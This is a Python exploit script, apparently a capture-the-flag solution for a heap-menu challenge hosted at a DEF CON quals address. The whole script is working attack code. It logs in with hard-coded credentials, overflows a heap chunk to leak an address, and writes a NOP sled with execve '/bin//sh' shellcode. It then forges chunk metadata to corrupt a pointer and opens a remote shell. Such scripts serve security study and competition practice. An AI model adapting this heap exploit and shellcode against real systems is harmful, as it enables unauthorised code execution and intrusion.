import phun

class P(phun.Remote):

    def __init__(self,*a,**k):
        self.last_free = 0 
        self.chunks = dict(( (i,False) for i in range(32)))
        super(P,self).__init__(*a,**k)
        self.sendlineafter("Enter username: ","mcfly")
        self.sendlineafter(": ","awesnap")        

    def get_max(self):
        for i in self.chunks:
            if not self.chunks[i]:
                print i
                return i
        return -1
    
    def cmd(self,nr):
        self.sendlineafter('| ',str(nr))

    def add(self,val):
        self.cmd(1)
        self.sendafter('> ',val)
        self.chunks[self.last_free] = True
        self.last_free = self.get_max()

    def free(self,n):
        self.cmd(3)
        self.sendlineafter(': ',str(n))
        self.chunks[n] = False
        self.last_free = n

    def modify(self,n,val):
        self.cmd(4)
        self.sendlineafter(': ',str(n))
        self.sendafter(': ',val)
        
    def show(self):
        self.cmd(2)
        r = []
        for i in self.chunks:
            if self.chunks[i]:
                r.append(self.readline())
        return r
        

r = P('beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me', 6969)
#r = P('localhost',1234)
r.add('aasdf\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')
r.add('dupadupa\n')


r.free(3)
r.free(1)
r.modify(0,'A'*(0x30 + 16 ))
x=r.show()[0][3:].strip('A')
if x[0] != "\xe0":
    print '[-] nope...'
heap = phun.u64(x[:-1]) - 0xe0
print hex(heap)

p="\xe9\x1b\x00\x00\x00" + "\x90"*0x20
p+="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
r.modify(0,p)
r.modify(4,'A'*0x30 + phun.p64(0,0x12+8,0x609958-0x18,heap+0x30,2) + "\x00\x00" + phun.p64(2)+"\n")
r.free(5)
r.shell()